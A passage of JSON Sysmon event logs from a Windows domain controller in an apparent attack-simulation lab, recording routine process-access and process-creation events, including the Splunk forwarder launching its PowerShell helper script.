STEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.679\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-0010F90C0400}\r\nProcessId: 3912\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.679","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-0010F90C0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-0010F90C0400}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-0010F90C0400}","TargetProcessId":"3912","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
